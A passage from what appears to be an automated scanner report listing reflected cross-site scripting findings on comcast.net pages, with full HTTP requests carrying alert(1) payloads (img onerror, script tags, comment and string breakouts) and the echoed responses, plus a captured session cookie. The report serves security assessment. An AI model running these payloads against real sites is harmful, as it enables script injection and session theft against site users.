This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbkda67d'%3bde5beb5d510/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:45 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/cbkda67d';de5beb5d510/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5 was submitted in the REST URL parameter 2. This input was echoed as 7d8b0<img src=a onerror=alert(1)>4a28518cd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-cbk7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'cbk7d8b0<img src=a onerror=alert(1)>4a28518cd5'</h2>
...[SNIP]...

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b was submitted in the REST URL parameter 2. This input was echoed as 72ecb<img src=a onerror=alert(1)>ee671481b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-mlb72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'mlb72ecb<img src=a onerror=alert(1)>ee671481b9b'</h2>
...[SNIP]...

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8d'%3ba545177219c was submitted in the REST URL parameter 2. This input was echoed as d5f8d';a545177219c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlbd5f8d'%3ba545177219c/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/mlbd5f8d';a545177219c/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31d78"%3bf24acd488c8 was submitted in the REST URL parameter 2. This input was echoed as 31d78";f24acd488c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-mlb31d78"%3bf24acd488c8/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:41 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/mlb31d78";f24acd488c8/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9d89<img%20src%3da%20onerror%3dalert(1)>a003304798 was submitted in the REST URL parameter 2. This input was echoed as b9d89<img src=a onerror=alert(1)>a003304798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-nflb9d89<img%20src%3da%20onerror%3dalert(1)>a003304798/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'nflb9d89<img src=a onerror=alert(1)>a003304798'</h2>
...[SNIP]...

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c4d"%3b7eb771f3fbf was submitted in the REST URL parameter 2. This input was echoed as 30c4d";7eb771f3fbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl30c4d"%3b7eb771f3fbf/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/nfl30c4d";7eb771f3fbf/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-nfl/20101219/Jaguars-Colts.Inactives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b123'%3bc5f8a8bc2aa was submitted in the REST URL parameter 2. This input was echoed as 4b123';c5f8a8bc2aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-nfl4b123'%3bc5f8a8bc2aa/20101219/Jaguars-Colts.Inactives/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/nfl4b123';c5f8a8bc2aa/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a was submitted in the REST URL parameter 2. This input was echoed as d868f--><img src=a onerror=alert(1)>5e235b0f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /entertainment/reelnewsd868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:19:01 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:19:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<!-- subchannel: reelnewsd868f--><img src=a onerror=alert(1)>5e235b0f13a -->
...[SNIP]...

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 was submitted in the REST URL parameter 2. This input was echoed as a6cf7<img src=a onerror=alert(1)>e7ac8a1e642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsa6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:54 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'reelnewsa6cf7<img src=a onerror=alert(1)>e7ac8a1e642'</h2>
...[SNIP]...

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /entertainment/reelnews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8d2"><script>alert(1)</script>befae20f7ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 19 Dec 2010 18:18:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109593

